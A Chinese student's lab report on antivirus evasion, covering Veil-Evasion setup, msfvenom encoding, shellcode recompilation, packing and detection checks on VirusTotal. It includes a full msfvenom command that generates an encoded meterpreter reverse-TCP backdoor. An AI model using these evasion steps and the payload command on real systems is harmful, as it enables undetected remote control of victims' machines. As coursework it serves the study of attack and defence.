实验三 免杀实践 赵文昊20155104
实验三 病毒免杀技术实践
环境搭建
在做实验之前试过好多方法在Kali中下载veil-evasion这款后门加壳的软件,最后在度娘的帮助下终于装上了,在这里给大家提供一个比较有效的安装方法(注:开发源加上中科大和阿里云等等)
apt-get clean
apt-get update
apt-get upgrade -y
apt-get install veil-evasion
veil-evasion
在安装Veil-evasion的过程中可能会报错,但只要安装程序不退出就不要着急,有些错误是不要紧的。在跳出安装界面的时候只需要不停地Next即可,界面也会出现很多乱码的字符所以就不要尝试读懂了-_-||
过程时间很长,推荐大家提前准备好实验软件,方便跟上老师的脚步。
实验要求和原理
这边是自己上理论课的收获,可能有错……大概吧……
所谓免杀,就是避免杀毒软件检测出我们传送的带病毒文件,然后,这个文件就可以不那么尴尬地被杀毒软件立刻Kill掉,是提升实用性的关键一步(希望我不会用到他)。
大部分杀毒软件是依赖特征码检测,所以最简单的免杀方式自然就是让这些特征码隐藏起来,等到我们执行它的时候,程序的本来面目再暴露出来。如果我们只有可执行文件,那我们需要给这个文件加壳。如果我们有shellcode,我们可以用encode编码或者payload重新编译它。如果我们有源码,那就简单很多,我们直接用其他语言重写再编译,不同编程语言所呈现的带病毒文件差别会非常大,特征码也会消失,这样也可以达到目的。
我打算就用实验二中那个后门软件开刀,尝试一下我们制作的免杀是否有效果。
检测方式就是我们找到的两个网站,今后有什么不确定的文件也可以丢进去检测一下,网站会给出一个比较可信的答复。
https://www.virustotal.com/
http://www.virscan.org/
后面给大家展示效果。
实验步骤
1 先用一下msfvenom编码器
我们先把上个实验做出来的后门扔进检测网站试一下。
很尴尬,这文件刚放进Windows,就被腾讯管家关小黑屋了。
从小黑屋放出来就可以了,我们分别放进两个网站检查一下,看起来杀毒软件还是比较厉害的(记住这几个没检测出来的,以后还是不用了)。
接下来,开始做免杀,让我们看一下效果怎么样。
编码器,让我们多编几次码,结果自然是没什么变化的。。。
msfvenom -p windows/meterpreter/reverse_tcp -x ./20155104.exe -i 5 -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.43.74 LPORT=5104 -f exe > 20155104_backdoor.exe
2 试试Veil-evasion
Veil-evasion是一个免杀平台,让我们试一下
我使用的版本是3.1.1,跟旧版本可能有一些不同的地方。
打开Veil-evasion,可以查看已加载的payload,有41个!
选择其中一个开始制作!我选的跟教程一样是21号。选好后是这样的!
在这里要设置一些信息,我把LocalHost设置成了自己的IP地址,并且把LocalPort设置成自己的学号。
最后给自己的程序起一个名字,然后完成,如果显示这样一个界面,我们的成品大概就制作好了!
在这个界面下依然会显示做好的文件路径,一定要记得复制一下!不然一会会头疼的。
好了,看一下,把东西拿出来,再放到网站上试一下。
可以看出来这个免杀是有那么些效果的。。。(虽然还是有不少能检测出来)
4 shellcode再编译,这个手工操作就有点费劲了
先生成一个c语言格式的shellcode
再编一个C语言编程的程序,简单一点用到这段生成的字符串即可,不用想的那么复杂。(因代码具有攻击性所以暂不显示了,有兴趣的自己摸索制作)
扔进网站,查得这样的结果,比预想的还要更好一些哦!
5 加壳
这段操作起来比较简单,需要我们提前准备一个有病毒的可执行文件(这里就决定是刚才生成的那个文件啦!)
老规矩,扔进网站,检查一下!
看得出来,这个效果不是很好,简单的加壳并不能给免杀带来太多的好处。
实验感想
免杀这个实验是提升实用性很关键的一堂课,这使我们攻击一个普遍的正常使用的机器成为了可能,虽然还没有达到无法防御的地步,但是经过一些诱导后,普遍的机器已经可以被我们入侵。但是,要想真正达到职业黑客的水平,这些还是不够的,我们目前无法让这病毒自启动,并将我们的操作提升到一个管理员或者说是root权限上,还有很多需要学习的地方。
杀毒软件的运作机制是我们考虑如何入侵的一个重要信息,我们要充分了解杀软才能避开检测,矛和盾是相互促进,必须相互了解才可以提高,这个实验也同时告诉了我们怎么更有效地进行防御。
